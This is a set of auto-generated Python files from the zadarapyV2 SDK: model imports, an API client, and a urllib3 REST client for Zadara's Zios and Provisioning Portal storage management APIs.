from Zios.models.inline_response20042 import InlineResponse20042
from Zios.models.inline_response20042_response import InlineResponse20042Response
from Zios.models.inline_response20042_response_credentials import InlineResponse20042ResponseCredentials
from Zios.models.inline_response20043 import InlineResponse20043
from Zios.models.inline_response20043_response import InlineResponse20043Response
from Zios.models.inline_response20043_response_user import InlineResponse20043ResponseUser
from Zios.models.inline_response20043_response_user_roles import InlineResponse20043ResponseUserRoles
from Zios.models.inline_response20043_response_user_zios_data import InlineResponse20043ResponseUserZiosData
from Zios.models.inline_response20043_response_user_zios_data_zios_user import InlineResponse20043ResponseUserZiosDataZiosUser
from Zios.models.inline_response20043_response_user_zios_data_zios_user_roles import InlineResponse20043ResponseUserZiosDataZiosUserRoles
from Zios.models.inline_response20044 import InlineResponse20044
from Zios.models.inline_response20045 import InlineResponse20045
from Zios.models.inline_response20046 import InlineResponse20046
from Zios.models.inline_response20046_response import InlineResponse20046Response
from Zios.models.inline_response20046_response_vcs import InlineResponse20046ResponseVcs
from Zios.models.inline_response20047 import InlineResponse20047
from Zios.models.inline_response20047_response import InlineResponse20047Response
from Zios.models.inline_response20047_response_vc import InlineResponse20047ResponseVc
from Zios.models.inline_response20048 import InlineResponse20048
from Zios.models.inline_response20048_response import InlineResponse20048Response
from Zios.models.inline_response20048_response_disks import InlineResponse20048ResponseDisks
from Zios.models.inline_response20049 import InlineResponse20049
from Zios.models.inline_response20049_objects import InlineResponse20049Objects
from Zios.models.inline_response2004_response import InlineResponse2004Response
from Zios.models.inline_response2004_response_users import InlineResponse2004ResponseUsers
from Zios.models.inline_response2005 import InlineResponse2005
from Zios.models.inline_response20050 import InlineResponse20050
from Zios.models.inline_response20050_objects import InlineResponse20050Objects
from Zios.models.inline_response2005_response import InlineResponse2005Response
from Zios.models.inline_response2006 import InlineResponse2006
from Zios.models.inline_response2006_response import InlineResponse2006Response
from Zios.models.inline_response2006_response_arguments import InlineResponse2006ResponseArguments
from Zios.models.inline_response2006_response_decided_by import InlineResponse2006ResponseDecidedBy
from Zios.models.inline_response2006_response_requests import InlineResponse2006ResponseRequests
from Zios.models.inline_response2007 import InlineResponse2007
from Zios.models.inline_response2007_response import InlineResponse2007Response
from Zios.models.inline_response2008 import InlineResponse2008
from Zios.models.inline_response2008_response import InlineResponse2008Response
from Zios.models.inline_response2009 import InlineResponse2009
from Zios.models.inline_response2009_response import InlineResponse2009Response
from Zios.models.inline_response200_response import InlineResponse200Response
from Zios.models.inline_response200_response_accounts import InlineResponse200ResponseAccounts | zadarapyV2 | /zadarapyV2-23.8.4.tar.gz/zadarapyV2-23.8.4/Zios/models/__init__.py | __init__.py |
from __future__ import absolute_import
import datetime
import json
import mimetypes
from multiprocessing.pool import ThreadPool
import os
import re
import tempfile
# python 2 and python 3 compatibility library
import six
from six.moves.urllib.parse import quote
from ProvisioningPortal.configuration import Configuration
import ProvisioningPortal.models
from ProvisioningPortal import rest
class ApiClient(object):
"""Generic API client for Swagger client library builds.
Swagger generic API client. This client handles the client-
server communication, and is invariant across implementations. Specifics of
the methods and models for each application are generated from the Swagger
templates.
NOTE: This class is auto generated by the swagger code generator program.
Ref: https://github.com/swagger-api/swagger-codegen
Do not edit the class manually.
:param configuration: .Configuration object for this client
:param header_name: a header to pass when making calls to the API.
:param header_value: a header value to pass when making calls to
the API.
:param cookie: a cookie to include in the header when making calls
to the API
"""
PRIMITIVE_TYPES = (float, bool, bytes, six.text_type) + six.integer_types
NATIVE_TYPES_MAPPING = {
'int': int,
'long': int if six.PY3 else long, # noqa: F821
'float': float,
'str': str,
'bool': bool,
'date': datetime.date,
'datetime': datetime.datetime,
'object': object,
}
def __init__(self, configuration=None, header_name=None, header_value=None,
cookie=None):
if configuration is None:
configuration = Configuration()
self.configuration = configuration
# Use the pool property to lazily initialize the ThreadPool.
self._pool = None
self.rest_client = rest.RESTClientObject(configuration)
self.default_headers = {}
if header_name is not None:
self.default_headers[header_name] = header_value
self.cookie = cookie
# Set default User-Agent.
self.user_agent = 'Swagger-Codegen/1.0.0/python'
self.client_side_validation = configuration.client_side_validation
def __del__(self):
if self._pool is not None:
self._pool.close()
self._pool.join()
@property
def pool(self):
if self._pool is None:
self._pool = ThreadPool()
return self._pool
@property
def user_agent(self):
"""User agent for this API client"""
return self.default_headers['User-Agent']
@user_agent.setter
def user_agent(self, value):
self.default_headers['User-Agent'] = value
def set_default_header(self, header_name, header_value):
self.default_headers[header_name] = header_value
def __call_api(
self, resource_path, method, path_params=None,
query_params=None, header_params=None, body=None, post_params=None,
files=None, response_type=None, auth_settings=None,
_return_http_data_only=None, collection_formats=None,
_preload_content=True, _request_timeout=None):
config = self.configuration
# header parameters
header_params = header_params or {}
header_params.update(self.default_headers)
if self.cookie:
header_params['Cookie'] = self.cookie
if header_params:
header_params = self.sanitize_for_serialization(header_params)
header_params = dict(self.parameters_to_tuples(header_params,
collection_formats))
# path parameters
if path_params:
path_params = self.sanitize_for_serialization(path_params)
path_params = self.parameters_to_tuples(path_params,
collection_formats)
for k, v in path_params:
# specified safe chars, encode everything
resource_path = resource_path.replace(
'{%s}' % k,
quote(str(v), safe=config.safe_chars_for_path_param)
)
# query parameters
if query_params:
query_params = self.sanitize_for_serialization(query_params)
query_params = self.parameters_to_tuples(query_params,
collection_formats)
# post parameters
if post_params or files:
post_params = self.prepare_post_parameters(post_params, files)
post_params = self.sanitize_for_serialization(post_params)
post_params = self.parameters_to_tuples(post_params,
collection_formats)
# auth setting
self.update_params_for_auth(header_params, query_params, auth_settings)
# body
if body:
body = self.sanitize_for_serialization(body)
# request url
url = self.configuration.host + resource_path
# perform request and return response
response_data = self.request(
method, url, query_params=query_params, headers=header_params,
post_params=post_params, body=body,
_preload_content=_preload_content,
_request_timeout=_request_timeout)
self.last_response = response_data
return_data = response_data
if _preload_content:
# deserialize response data
if response_type:
return_data = self.deserialize(response_data, response_type)
else:
return_data = None
if _return_http_data_only:
return (return_data)
else:
return (return_data, response_data.status,
response_data.getheaders())
def sanitize_for_serialization(self, obj):
"""Builds a JSON POST object.
If obj is None, return None.
If obj is str, int, long, float, bool, return directly.
If obj is datetime.datetime, datetime.date
convert to string in iso8601 format.
If obj is list, sanitize each element in the list.
If obj is dict, return the dict.
If obj is swagger model, return the properties dict.
:param obj: The data to serialize.
:return: The serialized form of data.
"""
if obj is None:
return None
elif isinstance(obj, self.PRIMITIVE_TYPES):
return obj
elif isinstance(obj, list):
return [self.sanitize_for_serialization(sub_obj)
for sub_obj in obj]
elif isinstance(obj, tuple):
return tuple(self.sanitize_for_serialization(sub_obj)
for sub_obj in obj)
elif isinstance(obj, (datetime.datetime, datetime.date)):
return obj.isoformat()
if isinstance(obj, dict):
obj_dict = obj
else:
# Convert model obj to dict except
# attributes `swagger_types`, `attribute_map`
# and attributes which value is not None.
# Convert attribute name to json key in
# model definition for request.
obj_dict = {obj.attribute_map[attr]: getattr(obj, attr)
for attr, _ in six.iteritems(obj.swagger_types)
if getattr(obj, attr) is not None}
return {key: self.sanitize_for_serialization(val)
for key, val in six.iteritems(obj_dict)}
def deserialize(self, response, response_type):
"""Deserializes response into an object.
:param response: RESTResponse object to be deserialized.
:param response_type: class literal for
deserialized object, or string of class name.
:return: deserialized object.
"""
# handle file downloading
# save response body into a tmp file and return the instance
if response_type == "file":
return self.__deserialize_file(response)
# fetch data from response object
try:
data = json.loads(response.data)
except ValueError:
data = response.data
return self.__deserialize(data, response_type)
def __deserialize(self, data, klass):
"""Deserializes dict, list, str into an object.
:param data: dict, list or str.
:param klass: class literal, or string of class name.
:return: object.
"""
if data is None:
return None
if type(klass) == str:
if klass.startswith('list['):
sub_kls = re.match(r'list\[(.*)\]', klass).group(1)
return [self.__deserialize(sub_data, sub_kls)
for sub_data in data]
if klass.startswith('dict('):
sub_kls = re.match(r'dict\(([^,]*), (.*)\)', klass).group(2)
return {k: self.__deserialize(v, sub_kls)
for k, v in six.iteritems(data)}
# convert str to class
if klass in self.NATIVE_TYPES_MAPPING:
klass = self.NATIVE_TYPES_MAPPING[klass]
else:
klass = getattr(ProvisioningPortal.models, klass)
if klass in self.PRIMITIVE_TYPES:
return self.__deserialize_primitive(data, klass)
elif klass == object:
return self.__deserialize_object(data)
elif klass == datetime.date:
return self.__deserialize_date(data)
elif klass == datetime.datetime:
return self.__deserialize_datatime(data)
else:
return self.__deserialize_model(data, klass)
def call_api(self, resource_path, method,
path_params=None, query_params=None, header_params=None,
body=None, post_params=None, files=None,
response_type=None, auth_settings=None, async_req=None,
_return_http_data_only=None, collection_formats=None,
_preload_content=True, _request_timeout=None):
"""Makes the HTTP request (synchronous) and returns deserialized data.
To make an async request, set the async_req parameter.
:param resource_path: Path to method endpoint.
:param method: Method to call.
:param path_params: Path parameters in the url.
:param query_params: Query parameters in the url.
:param header_params: Header parameters to be
placed in the request header.
:param body: Request body.
:param post_params dict: Request post form parameters,
for `application/x-www-form-urlencoded`, `multipart/form-data`.
:param auth_settings list: Auth Settings names for the request.
:param response: Response data type.
:param files dict: key -> filename, value -> filepath,
for `multipart/form-data`.
:param async_req bool: execute request asynchronously
:param _return_http_data_only: response data without head status code
and headers
:param collection_formats: dict of collection formats for path, query,
header, and post parameters.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return:
If async_req parameter is True,
the request will be called asynchronously.
The method will return the request thread.
If parameter async_req is False or missing,
then the method will return the response directly.
"""
if not async_req:
return self.__call_api(resource_path, method,
path_params, query_params, header_params,
body, post_params, files,
response_type, auth_settings,
_return_http_data_only, collection_formats,
_preload_content, _request_timeout)
else:
thread = self.pool.apply_async(self.__call_api, (resource_path,
method, path_params, query_params,
header_params, body,
post_params, files,
response_type, auth_settings,
_return_http_data_only,
collection_formats,
_preload_content, _request_timeout))
return thread
def request(self, method, url, query_params=None, headers=None,
post_params=None, body=None, _preload_content=True,
_request_timeout=None):
"""Makes the HTTP request using RESTClient."""
if method == "GET":
return self.rest_client.GET(url,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
headers=headers)
elif method == "HEAD":
return self.rest_client.HEAD(url,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
headers=headers)
elif method == "OPTIONS":
return self.rest_client.OPTIONS(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "POST":
return self.rest_client.POST(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "PUT":
return self.rest_client.PUT(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "PATCH":
return self.rest_client.PATCH(url,
query_params=query_params,
headers=headers,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
elif method == "DELETE":
return self.rest_client.DELETE(url,
query_params=query_params,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
else:
raise ValueError(
"http method must be `GET`, `HEAD`, `OPTIONS`,"
" `POST`, `PATCH`, `PUT` or `DELETE`."
)
def parameters_to_tuples(self, params, collection_formats):
"""Get parameters as list of tuples, formatting collections.
:param params: Parameters as dict or list of two-tuples
:param dict collection_formats: Parameter collection formats
:return: Parameters as list of tuples, collections formatted
"""
new_params = []
if collection_formats is None:
collection_formats = {}
for k, v in six.iteritems(params) if isinstance(params, dict) else params: # noqa: E501
if k in collection_formats:
collection_format = collection_formats[k]
if collection_format == 'multi':
new_params.extend((k, value) for value in v)
else:
if collection_format == 'ssv':
delimiter = ' '
elif collection_format == 'tsv':
delimiter = '\t'
elif collection_format == 'pipes':
delimiter = '|'
else: # csv is the default
delimiter = ','
new_params.append(
(k, delimiter.join(str(value) for value in v)))
else:
new_params.append((k, v))
return new_params
def prepare_post_parameters(self, post_params=None, files=None):
"""Builds form parameters.
:param post_params: Normal form parameters.
:param files: File parameters.
:return: Form parameters with files.
"""
params = []
if post_params:
params = post_params
if files:
for k, v in six.iteritems(files):
if not v:
continue
file_names = v if type(v) is list else [v]
for n in file_names:
with open(n, 'rb') as f:
filename = os.path.basename(f.name)
filedata = f.read()
mimetype = (mimetypes.guess_type(filename)[0] or
'application/octet-stream')
params.append(
tuple([k, tuple([filename, filedata, mimetype])]))
return params
def select_header_accept(self, accepts):
"""Returns `Accept` based on an array of accepts provided.
:param accepts: List of headers.
:return: Accept (e.g. application/json).
"""
if not accepts:
return
accepts = [x.lower() for x in accepts]
if 'application/json' in accepts:
return 'application/json'
else:
return ', '.join(accepts)
def select_header_content_type(self, content_types):
"""Returns `Content-Type` based on an array of content_types provided.
:param content_types: List of content-types.
:return: Content-Type (e.g. application/json).
"""
if not content_types:
return 'application/json'
content_types = [x.lower() for x in content_types]
if 'application/json' in content_types or '*/*' in content_types:
return 'application/json'
else:
return content_types[0]
def update_params_for_auth(self, headers, querys, auth_settings):
"""Updates header and query params based on authentication setting.
:param headers: Header parameters dict to be updated.
:param querys: Query parameters tuple list to be updated.
:param auth_settings: Authentication setting identifiers list.
"""
if not auth_settings:
return
for auth in auth_settings:
auth_setting = self.configuration.auth_settings().get(auth)
if auth_setting:
if not auth_setting['value']:
continue
elif auth_setting['in'] == 'header':
headers[auth_setting['key']] = auth_setting['value']
elif auth_setting['in'] == 'query':
querys.append((auth_setting['key'], auth_setting['value']))
else:
raise ValueError(
'Authentication token must be in `query` or `header`'
)
def __deserialize_file(self, response):
"""Deserializes body to file
Saves response body into a file in a temporary folder,
using the filename from the `Content-Disposition` header if provided.
:param response: RESTResponse.
:return: file path.
"""
fd, path = tempfile.mkstemp(dir=self.configuration.temp_folder_path)
os.close(fd)
os.remove(path)
content_disposition = response.getheader("Content-Disposition")
if content_disposition:
filename = re.search(r'filename=[\'"]?([^\'"\s]+)[\'"]?',
content_disposition).group(1)
path = os.path.join(os.path.dirname(path), filename)
with open(path, "w") as f:
f.write(response.data)
return path
def __deserialize_primitive(self, data, klass):
"""Deserializes string to primitive type.
:param data: str.
:param klass: class literal.
:return: int, long, float, str, bool.
"""
try:
return klass(data)
except UnicodeEncodeError:
return six.text_type(data)
except TypeError:
return data
def __deserialize_object(self, value):
"""Return a original value.
:return: object.
"""
return value
def __deserialize_date(self, string):
"""Deserializes string to date.
:param string: str.
:return: date.
"""
try:
from dateutil.parser import parse
return parse(string).date()
except ImportError:
return string
except ValueError:
raise rest.ApiException(
status=0,
reason="Failed to parse `{0}` as date object".format(string)
)
def __deserialize_datatime(self, string):
"""Deserializes string to datetime.
The string should be in iso8601 datetime format.
:param string: str.
:return: datetime.
"""
try:
from dateutil.parser import parse
return parse(string)
except ImportError:
return string
except ValueError:
raise rest.ApiException(
status=0,
reason=(
"Failed to parse `{0}` as datetime object"
.format(string)
)
)
def __hasattr(self, object, name):
return name in object.__class__.__dict__
def __deserialize_model(self, data, klass):
"""Deserializes list or dict to model.
:param data: dict, list.
:param klass: class literal.
:return: model object.
"""
if (not klass.swagger_types and
not self.__hasattr(klass, 'get_real_child_model')):
return data
kwargs = {}
if klass.swagger_types is not None:
for attr, attr_type in six.iteritems(klass.swagger_types):
if (data is not None and
klass.attribute_map[attr] in data and
isinstance(data, (list, dict))):
value = data[klass.attribute_map[attr]]
kwargs[attr] = self.__deserialize(value, attr_type)
instance = klass(**kwargs)
if (isinstance(instance, dict) and
klass.swagger_types is not None and
isinstance(data, dict)):
for key, value in data.items():
if key not in klass.swagger_types:
instance[key] = value
if self.__hasattr(instance, 'get_real_child_model'):
klass_name = instance.get_real_child_model(data)
if klass_name:
instance = self.__deserialize(data, klass_name)
return instance | zadarapyV2 | /zadarapyV2-23.8.4.tar.gz/zadarapyV2-23.8.4/ProvisioningPortal/api_client.py | api_client.py |
from __future__ import absolute_import
import io
import json
import logging
import re
import ssl
import certifi
# python 2 and python 3 compatibility library
import six
from six.moves.urllib.parse import urlencode
try:
import urllib3
except ImportError:
raise ImportError('Swagger python client requires urllib3.')
logger = logging.getLogger(__name__)
class RESTResponse(io.IOBase):
def __init__(self, resp):
self.urllib3_response = resp
self.status = resp.status
self.reason = resp.reason
self.data = resp.data
def getheaders(self):
"""Returns a dictionary of the response headers."""
return self.urllib3_response.getheaders()
def getheader(self, name, default=None):
"""Returns a given response header."""
return self.urllib3_response.getheader(name, default)
class RESTClientObject(object):
def __init__(self, configuration, pools_size=4, maxsize=None):
# urllib3.PoolManager will pass all kw parameters to connectionpool
# https://github.com/shazow/urllib3/blob/f9409436f83aeb79fbaf090181cd81b784f1b8ce/urllib3/poolmanager.py#L75 # noqa: E501
# https://github.com/shazow/urllib3/blob/f9409436f83aeb79fbaf090181cd81b784f1b8ce/urllib3/connectionpool.py#L680 # noqa: E501
# maxsize is the number of requests to host that are allowed in parallel # noqa: E501
# Custom SSL certificates and client certificates: http://urllib3.readthedocs.io/en/latest/advanced-usage.html # noqa: E501
# cert_reqs
if configuration.verify_ssl:
cert_reqs = ssl.CERT_REQUIRED
else:
cert_reqs = ssl.CERT_NONE
# ca_certs
if configuration.ssl_ca_cert:
ca_certs = configuration.ssl_ca_cert
else:
# if not set certificate file, use Mozilla's root certificates.
ca_certs = certifi.where()
addition_pool_args = {}
if configuration.assert_hostname is not None:
addition_pool_args['assert_hostname'] = configuration.assert_hostname # noqa: E501
if maxsize is None:
if configuration.connection_pool_maxsize is not None:
maxsize = configuration.connection_pool_maxsize
else:
maxsize = 4
# https pool manager
if configuration.proxy:
self.pool_manager = urllib3.ProxyManager(
num_pools=pools_size,
maxsize=maxsize,
cert_reqs=cert_reqs,
ca_certs=ca_certs,
cert_file=configuration.cert_file,
key_file=configuration.key_file,
proxy_url=configuration.proxy,
**addition_pool_args
)
else:
self.pool_manager = urllib3.PoolManager(
num_pools=pools_size,
maxsize=maxsize,
cert_reqs=cert_reqs,
ca_certs=ca_certs,
cert_file=configuration.cert_file,
key_file=configuration.key_file,
**addition_pool_args
)
def request(self, method, url, query_params=None, headers=None,
body=None, post_params=None, _preload_content=True,
_request_timeout=None):
"""Perform requests.
:param method: http request method
:param url: http request url
:param query_params: query parameters in the url
:param headers: http request headers
:param body: request json body, for `application/json`
:param post_params: request post parameters,
`application/x-www-form-urlencoded`
and `multipart/form-data`
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
"""
method = method.upper()
assert method in ['GET', 'HEAD', 'DELETE', 'POST', 'PUT',
'PATCH', 'OPTIONS']
if post_params and body:
raise ValueError(
"body parameter cannot be used with post_params parameter."
)
post_params = post_params or {}
headers = headers or {}
timeout = None
if _request_timeout:
if isinstance(_request_timeout, (int, ) if six.PY3 else (int, long)): # noqa: E501,F821
timeout = urllib3.Timeout(total=_request_timeout)
elif (isinstance(_request_timeout, tuple) and
len(_request_timeout) == 2):
timeout = urllib3.Timeout(
connect=_request_timeout[0], read=_request_timeout[1])
if 'Content-Type' not in headers:
headers['Content-Type'] = 'application/json'
try:
# For `POST`, `PUT`, `PATCH`, `OPTIONS`, `DELETE`
if method in ['POST', 'PUT', 'PATCH', 'OPTIONS', 'DELETE']:
if query_params:
url += '?' + urlencode(query_params)
if re.search('json', headers['Content-Type'], re.IGNORECASE):
request_body = '{}'
if body is not None:
request_body = json.dumps(body)
r = self.pool_manager.request(
method, url,
body=request_body,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
elif headers['Content-Type'] == 'application/x-www-form-urlencoded': # noqa: E501
r = self.pool_manager.request(
method, url,
fields=post_params,
encode_multipart=False,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
elif headers['Content-Type'] == 'multipart/form-data':
# must del headers['Content-Type'], or the correct
# Content-Type which generated by urllib3 will be
# overwritten.
del headers['Content-Type']
r = self.pool_manager.request(
method, url,
fields=post_params,
encode_multipart=True,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
# Pass a `string` parameter directly in the body to support
# other content types than Json when `body` argument is
# provided in serialized form
elif isinstance(body, str):
request_body = body
r = self.pool_manager.request(
method, url,
body=request_body,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
else:
# Cannot generate the request from given parameters
msg = """Cannot prepare a request message for provided
arguments. Please check that your arguments match
declared content type."""
raise ApiException(status=0, reason=msg)
# For `GET`, `HEAD`
else:
r = self.pool_manager.request(method, url,
fields=query_params,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
except urllib3.exceptions.SSLError as e:
msg = "{0}\n{1}".format(type(e).__name__, str(e))
raise ApiException(status=0, reason=msg)
if _preload_content:
r = RESTResponse(r)
# In the python 3, the response.data is bytes.
# we need to decode it to string.
if six.PY3:
r.data = r.data.decode('utf8')
# log response body
logger.debug("response body: %s", r.data)
if not 200 <= r.status <= 299:
raise ApiException(http_resp=r)
return r
def GET(self, url, headers=None, query_params=None, _preload_content=True,
_request_timeout=None):
return self.request("GET", url,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
query_params=query_params)
def HEAD(self, url, headers=None, query_params=None, _preload_content=True,
_request_timeout=None):
return self.request("HEAD", url,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
query_params=query_params)
def OPTIONS(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("OPTIONS", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def DELETE(self, url, headers=None, query_params=None, body=None,
_preload_content=True, _request_timeout=None):
return self.request("DELETE", url,
headers=headers,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def POST(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("POST", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def PUT(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("PUT", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def PATCH(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("PATCH", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
class ApiException(Exception):
def __init__(self, status=None, reason=None, http_resp=None):
if http_resp:
self.status = http_resp.status
self.reason = http_resp.reason
self.body = http_resp.data
self.headers = http_resp.getheaders()
else:
self.status = status
self.reason = reason
self.body = None
self.headers = None
def __str__(self):
"""Custom error messages for exception"""
error_message = "({0})\n"\
"Reason: {1}\n".format(self.status, self.reason)
if self.headers:
error_message += "HTTP response headers: {0}\n".format(
self.headers)
if self.body:
error_message += "HTTP response body: {0}\n".format(self.body)
return error_message | zadarapyV2 | /zadarapyV2-23.8.4.tar.gz/zadarapyV2-23.8.4/ProvisioningPortal/rest.py | rest.py |
# flake8: noqa
"""
Zadara Provisioning Portal API
# Overview This document outlines the methods available for creation and high-level administration of Zadara Storage VPSAs via a Zadara Storage Provisioning Portal. This API supports form-encoded requests, and can return either JSON or XML responses. ## Endpoint The base URL for the requests is the Provisioning Portal URL you created your VPSA through - for example: https://manage.zadarastorage.com/, and all APIs will be prefixed with /api as noted in the documentation below. ## Authentication To use this API, an authentication token is required. The API for retrieving this token can be found below in the Authentication section. You may pass this token in requests either via the the X-Token header or via basic authentication (base64 encoded) in Authorization header. ## Questions If you have any questions or need support involving the REST API, please contact for assistance. # noqa: E501
OpenAPI spec version: v23.8.4
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
# import apis into sdk package
from ProvisioningPortal.api.authentication_api import AuthenticationApi
from ProvisioningPortal.api.cloud_api import CloudApi
from ProvisioningPortal.api.providers_api import ProvidersApi
from ProvisioningPortal.api.tenant_api import TenantApi
from ProvisioningPortal.api.vpsa_api import VPSAApi
from ProvisioningPortal.api.vpsa_and_zios_api import VPSAAndZIOSApi
from ProvisioningPortal.api.virtual_network_api import VirtualNetworkApi
from ProvisioningPortal.api.vlan_api import VlanApi
from ProvisioningPortal.api.vpsa_requests_api import VpsaRequestsApi
from ProvisioningPortal.api.zios_api import ZIOSApi
# import ApiClient
from ProvisioningPortal.api_client import ApiClient
from ProvisioningPortal.configuration import Configuration
# import models into sdk package
from ProvisioningPortal.models.body_add_proxy_vc_to_vpsa_object_storage import BodyAddProxyVcToVpsaObjectStorage
from ProvisioningPortal.models.body_add_proxy_vc_to_zios import BodyAddProxyVcToZios
from ProvisioningPortal.models.body_add_storage_policy_to_vpsa_object_storage import BodyAddStoragePolicyToVpsaObjectStorage
from ProvisioningPortal.models.body_add_storage_to_vpsa import BodyAddStorageToVpsa
from ProvisioningPortal.models.body_add_virtual_network_vpsa import BodyAddVirtualNetworkVpsa
from ProvisioningPortal.models.body_alloacate_vlan import BodyAlloacateVlan
from ProvisioningPortal.models.body_approve import BodyApprove
from ProvisioningPortal.models.body_change_vpsa_flash_cache_capacity import BodyChangeVpsaFlashCacheCapacity
from ProvisioningPortal.models.body_change_vpsa_zadara_engine import BodyChangeVpsaZadaraEngine
from ProvisioningPortal.models.body_create_cloud import BodyCreateCloud
from ProvisioningPortal.models.body_create_object_storage_account import BodyCreateObjectStorageAccount
from ProvisioningPortal.models.body_create_provider import BodyCreateProvider
from ProvisioningPortal.models.body_create_provider_group import BodyCreateProviderGroup
from ProvisioningPortal.models.body_create_zios import BodyCreateZios
from ProvisioningPortal.models.body_deallocate_vlan import BodyDeallocateVlan
from ProvisioningPortal.models.body_delete_virtual_networks import BodyDeleteVirtualNetworks
from ProvisioningPortal.models.body_deny import BodyDeny
from ProvisioningPortal.models.body_enable_object_account import BodyEnableObjectAccount
from ProvisioningPortal.models.body_get_authentication_token import BodyGetAuthenticationToken
from ProvisioningPortal.models.body_list_availiable_vlan_for_provider import BodyListAvailiableVlanForProvider
from ProvisioningPortal.models.body_remove_vni_from_vpsa import BodyRemoveVniFromVpsa
from ProvisioningPortal.models.body_reset_authentication_token import BodyResetAuthenticationToken
from ProvisioningPortal.models.body_set_flavor_price import BodySetFlavorPrice
from ProvisioningPortal.models.body_set_vlan_as_default import BodySetVlanAsDefault
from ProvisioningPortal.models.body_update_cloud import BodyUpdateCloud
from ProvisioningPortal.models.body_update_object_account import BodyUpdateObjectAccount
from ProvisioningPortal.models.body_update_provider import BodyUpdateProvider
from ProvisioningPortal.models.body_update_provider_group import BodyUpdateProviderGroup
from ProvisioningPortal.models.default import Default
from ProvisioningPortal.models.default_response import DefaultResponse
from ProvisioningPortal.models.error import Error
from ProvisioningPortal.models.inline_response200 import InlineResponse200
from ProvisioningPortal.models.inline_response2001 import InlineResponse2001
from ProvisioningPortal.models.inline_response20010 import InlineResponse20010
from ProvisioningPortal.models.inline_response20010_data import InlineResponse20010Data
from ProvisioningPortal.models.inline_response20011 import InlineResponse20011
from ProvisioningPortal.models.inline_response20011_data import InlineResponse20011Data
from ProvisioningPortal.models.inline_response20012 import InlineResponse20012
from ProvisioningPortal.models.inline_response20012_data import InlineResponse20012Data
from ProvisioningPortal.models.inline_response20013 import InlineResponse20013
from ProvisioningPortal.models.inline_response20014 import InlineResponse20014
from ProvisioningPortal.models.inline_response20014_data import InlineResponse20014Data
from ProvisioningPortal.models.inline_response20015 import InlineResponse20015
from ProvisioningPortal.models.inline_response20016 import InlineResponse20016
from ProvisioningPortal.models.inline_response20017 import InlineResponse20017
from ProvisioningPortal.models.inline_response20018 import InlineResponse20018
from ProvisioningPortal.models.inline_response20018_data import InlineResponse20018Data
from ProvisioningPortal.models.inline_response20018_data_datum import InlineResponse20018DataDatum
from ProvisioningPortal.models.inline_response20018_data_datum_app_engine import InlineResponse20018DataDatumAppEngine
from ProvisioningPortal.models.inline_response20018_data_datum_cache import InlineResponse20018DataDatumCache
from ProvisioningPortal.models.inline_response20018_data_datum_engine import InlineResponse20018DataDatumEngine
from ProvisioningPortal.models.inline_response20018_data_datum_provider import InlineResponse20018DataDatumProvider
from ProvisioningPortal.models.inline_response20019 import InlineResponse20019
from ProvisioningPortal.models.inline_response20019_data import InlineResponse20019Data
from ProvisioningPortal.models.inline_response20019_data_app_engine import InlineResponse20019DataAppEngine
from ProvisioningPortal.models.inline_response20019_data_cache import InlineResponse20019DataCache
from ProvisioningPortal.models.inline_response20019_data_drives import InlineResponse20019DataDrives
from ProvisioningPortal.models.inline_response20019_data_engine import InlineResponse20019DataEngine
from ProvisioningPortal.models.inline_response20019_data_ipv6_address import InlineResponse20019DataIpv6Address
from ProvisioningPortal.models.inline_response20019_data_provider import InlineResponse20019DataProvider
from ProvisioningPortal.models.inline_response20019_data_publiczios import InlineResponse20019DataPubliczios
from ProvisioningPortal.models.inline_response20019_data_storage_policies import InlineResponse20019DataStoragePolicies
from ProvisioningPortal.models.inline_response2001_app_engines import InlineResponse2001AppEngines
from ProvisioningPortal.models.inline_response2001_cache import InlineResponse2001Cache
from ProvisioningPortal.models.inline_response2001_data import InlineResponse2001Data
from ProvisioningPortal.models.inline_response2001_drive_types import InlineResponse2001DriveTypes
from ProvisioningPortal.models.inline_response2001_engine_types import InlineResponse2001EngineTypes
from ProvisioningPortal.models.inline_response2001_fibre_channel import InlineResponse2001FibreChannel
from ProvisioningPortal.models.inline_response2001_flash_cache import InlineResponse2001FlashCache
from ProvisioningPortal.models.inline_response2001_vpsazone_group_storage_policy_types import InlineResponse2001VpsazoneGroupStoragePolicyTypes
